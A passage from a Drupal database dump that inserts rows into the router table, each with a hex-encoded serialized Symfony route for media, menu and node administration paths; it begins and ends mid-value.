6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a31393a226163636573735f636865636b2e637573746f6d223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a313a7b693a303b733a333a22474554223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a2266696c7465725f666f726d6174223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34373a227b5e2f6d656469612f283f503c66696c7465725f666f726d61743e5b5e2f5d2b2b292f70726576696577247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f70726576696577223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a2266696c7465725f666f726d6174223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a363a222f6d65646961223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a2266696c7465725f666f726d6174223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a31363a222f6d656469612f252f70726576696577223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('media.oembed_iframe', '/media/oembed', '/media/oembed', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31333a222f6d656469612f6f656d626564223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35353a225c44727570616c5c6d656469615c436f6e74726f6c6c65725c4f456d626564496672616d65436f6e74726f6c6c65723a3a72656e646572223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31303a2276696577206d65646961223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32303a227b5e2f6d656469612f6f656d626564247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f6d656469612f6f656d626564223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31333a222f6d656469612f6f656d626564223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('media.settings', '/admin/config/media/media-settings', '/admin/config/media/media-settings', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33343a222f61646d696e2f636f6e6669672f6d656469612f6d656469612d73657474696e6773223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33363a225c44727570616c5c6d656469615c466f726d5c4d6564696153657474696e6773466f726d223b733a363a225f7469746c65223b733a31343a224d656469612073657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31363a2261646d696e6973746572206d65646961223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34323a227b5e2f61646d696e2f636f6e6669672f6d656469612f6d656469615c2d73657474696e6773247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f636f6e6669672f6d656469612f6d656469612d73657474696e6773223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33343a222f61646d696e2f636f6e6669672f6d656469612f6d656469612d73657474696e6773223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('media_library.settings', '/admin/config/media/media-library', '/admin/config/media/media-library', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33333a222f61646d696e2f636f6e6669672f6d656469612f6d656469612d6c696272617279223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33393a225c44727570616c5c6d656469615f6c6962726172795c466f726d5c53657474696e6773466f726d223b733a363a225f7469746c65223b733a32323a224d65646961204c6962726172792073657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31363a2261646d696e6973746572206d65646961223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34313a227b5e2f61646d696e2f636f6e6669672f6d656469612f6d656469615c2d6c696272617279247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f61646d696e2f636f6e6669672f6d656469612f6d656469612d6c696272617279223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33333a222f61646d696e2f636f6e6669672f6d656469612f6d656469612d6c696272617279223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('media_library.ui', '/media-library', '/media-library', 1, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31343a222f6d656469612d6c696272617279223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a33323a226d656469615f6c6962726172792e75695f6275696c6465723a6275696c645569223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f637573746f6d5f616363657373223b733a33363a226d656469615f6c6962726172792e75695f6275696c6465723a636865636b416363657373223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e637573746f6d223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32323a227b5e2f6d656469615c2d6c696272617279247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f6d656469612d6c696272617279223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313b733a31343a227061747465726e4f75746c696e65223b733a31343a222f6d656469612d6c696272617279223b733a383a226e756d5061727473223b693a313b7d7d, 1),
('menu_ui.link_edit', '/admin/structure/menu/link/{menu_link_plugin}/edit', '/admin/structure/menu/link/%/edit', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35303a222f61646d696e2f7374727563747572652f6d656e752f6c696e6b2f7b6d656e755f6c696e6b5f706c7567696e7d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33373a225c44727570616c5c6d656e755f75695c466f726d5c4d656e754c696e6b45646974466f726d223b733a363a225f7469746c65223b733a31343a2245646974206d656e75206c696e6b223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31353a2261646d696e6973746572206d656e75223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a226d656e755f6c696e6b5f706c7567696e223b613a323a7b733a343a2274797065223b733a31363a226d656e755f6c696e6b5f706c7567696e223b733a393a22636f6e766572746572223b733a35343a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e6d656e755f6c696e6b223b7d7d733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31363a226d656e755f6c696e6b5f706c7567696e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36373a227b5e2f61646d696e2f7374727563747572652f6d656e752f6c696e6b2f283f503c6d656e755f6c696e6b5f706c7567696e3e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a226d656e755f6c696e6b5f706c7567696e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f7374727563747572652f6d656e752f6c696e6b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31363a226d656e755f6c696e6b5f706c7567696e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33333a222f61646d696e2f7374727563747572652f6d656e752f6c696e6b2f252f65646974223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('menu_ui.link_reset', '/admin/structure/menu/link/{menu_link_plugin}/reset', '/admin/structure/menu/link/%/reset', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35313a222f61646d696e2f7374727563747572652f6d656e752f6c696e6b2f7b6d656e755f6c696e6b5f706c7567696e7d2f7265736574223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33383a225c44727570616c5c6d656e755f75695c466f726d5c4d656e754c696e6b5265736574466f726d223b733a363a225f7469746c65223b733a31353a225265736574206d656e75206c696e6b223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31353a2261646d696e6973746572206d656e75223b733a31343a225f637573746f6d5f616363657373223b733a35363a225c44727570616c5c6d656e755f75695c466f726d5c4d656e754c696e6b5265736574466f726d3a3a6c696e6b497352657365747461626c65223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a226d656e755f6c696e6b5f706c7567696e223b613a323a7b733a343a2274797065223b733a31363a226d656e755f6c696e6b5f706c7567696e223b733a393a22636f6e766572746572223b733a35343a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e6d656e755f6c696e6b223b7d7d733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a31393a226163636573735f636865636b2e637573746f6d223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31363a226d656e755f6c696e6b5f706c7567696e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36383a227b5e2f61646d696e2f7374727563747572652f6d656e752f6c696e6b2f283f503c6d656e755f6c696e6b5f706c7567696e3e5b5e2f5d2b2b292f7265736574247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a363a222f7265736574223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a226d656e755f6c696e6b5f706c7567696e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f7374727563747572652f6d656e752f6c696e6b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31363a226d656e755f6c696e6b5f706c7567696e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33343a222f61646d696e2f7374727563747572652f6d656e752f6c696e6b2f252f7265736574223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('menu_ui.parent_options_js', '/admin/structure/menu/parents', '/admin/structure/menu/parents', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32393a222f61646d696e2f7374727563747572652f6d656e752f706172656e7473223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35393a225c44727570616c5c6d656e755f75695c436f6e74726f6c6c65725c4d656e75436f6e74726f6c6c65723a3a676574506172656e744f7074696f6e73223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31353a2261646d696e6973746572206d656e75223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33363a227b5e2f61646d696e2f7374727563747572652f6d656e752f706172656e7473247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656e752f706172656e7473223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32393a222f61646d696e2f7374727563747572652f6d656e752f706172656e7473223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('node.add', '/node/add/{node_type}', '/node/add/%', 6, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32313a222f6e6f64652f6164642f7b6e6f64655f747970657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31323a226e6f64652e64656661756c74223b733a31353a225f7469746c655f63616c6c6261636b223b733a35323a225c44727570616c5c6e6f64655c436f6e74726f6c6c65725c4e6f6465436f6e74726f6c6c65723a3a616464506167655469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32313a225f656e746974795f6372656174655f616363657373223b733a31363a226e6f64653a7b6e6f64655f747970657d223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a32313a225f6e6f64655f6f7065726174696f6e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a393a226e6f64655f74797065223b613a333a7b733a343a2274797065223b733a31363a22656e746974793a6e6f64655f74797065223b733a32313a22776974685f636f6e6669675f6f7665727269646573223b623a313b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32363a226163636573735f636865636b2e656e746974795f637265617465223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33383a227b5e2f6e6f64652f6164642f283f503c6e6f64655f747970653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a393a222f6e6f64652f616464223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a363b733a31343a227061747465726e4f75746c696e65223b733a31313a222f6e6f64652f6164642f25223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('node.add_page', '/node/add', '/node/add', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a393a222f6e6f64652f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a363a225f7469746c65223b733a31313a2241646420636f6e74656e74223b733a31313a225f636f6e74726f6c6c6572223b733a34373a225c44727570616c5c6e6f64655c436f6e74726f6c6c65725c4e6f6465436f6e74726f6c6c65723a3a61646450616765223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32353a225f656e746974795f6372656174655f616e795f616363657373223b733a343a226e6f6465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a32313a225f6e6f64655f6f7065726174696f6e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a226163636573735f636865636b2e656e746974795f6372656174655f616e79223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a31363a227b5e2f6e6f64652f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a393a222f6e6f64652f616464223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a393a222f6e6f64652f616464223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('node.configure_rebuild_confirm', '/admin/reports/status/rebuild', '/admin/reports/status/rebuild', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32393a222f61646d696e2f7265706f7274732f7374617475732f72656275696c64223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a353a225f666f726d223b733a34303a225c44727570616c5c6e6f64655c466f726d5c52656275696c645065726d697373696f6e73466f726d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31363a2261646d696e6973746572206e6f646573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33363a227b5e2f61646d696e2f7265706f7274732f7374617475732f72656275696c64247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7265706f7274732f7374617475732f72656275696c64223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32393a222f61646d696e2f7265706f7274732f7374617475732f72656275696c64223b733a383a226e756d5061727473223b693a343b7d7d, 4);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('node.multiple_delete_confirm', '/admin/content/node/delete', '/admin/content/node/delete', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32363a222f61646d696e2f636f6e74656e742f6e6f64652f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33323a225c44727570616c5c6e6f64655c466f726d5c44656c6574654d756c7469706c65223b733a31343a22656e746974795f747970655f6964223b733a343a226e6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33303a225f656e746974795f64656c6574655f6d756c7469706c655f616363657373223b733a343a226e6f6465223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33353a226163636573735f636865636b2e656e746974795f64656c6574655f6d756c7469706c65223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33333a227b5e2f61646d696e2f636f6e74656e742f6e6f64652f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f636f6e74656e742f6e6f64652f64656c657465223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32363a222f61646d696e2f636f6e74656e742f6e6f64652f64656c657465223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('node.revision_delete_confirm', '/node/{node}/revisions/{node_revision}/delete', '/node/%/revisions/%/delete', 21, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34353a222f6e6f64652f7b6e6f64657d2f7265766973696f6e732f7b6e6f64655f7265766973696f6e7d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34303a225c44727570616c5c6e6f64655c466f726d5c4e6f64655265766973696f6e44656c657465466f726d223b733a363a225f7469746c65223b733a32333a2244656c657465206561726c696572207265766973696f6e223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a32393a226e6f64655f7265766973696f6e2e64656c657465207265766973696f6e223b733a343a226e6f6465223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a32313a225f6e6f64655f6f7065726174696f6e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a323a7b733a343a226e6f6465223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6e6f6465223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d733a31333a226e6f64655f7265766973696f6e223b613a323a7b733a343a2274797065223b733a32303a22656e746974795f7265766973696f6e3a6e6f6465223b733a393a22636f6e766572746572223b733a33303a22706172616d636f6e7665727465722e656e746974795f7265766973696f6e223b7d7d733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a343a226e6f6465223b693a313b733a31333a226e6f64655f7265766973696f6e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36393a227b5e2f6e6f64652f283f503c6e6f64653e5c642b292f7265766973696f6e732f283f503c6e6f64655f7265766973696f6e3e5b5e2f5d2b2b292f64656c65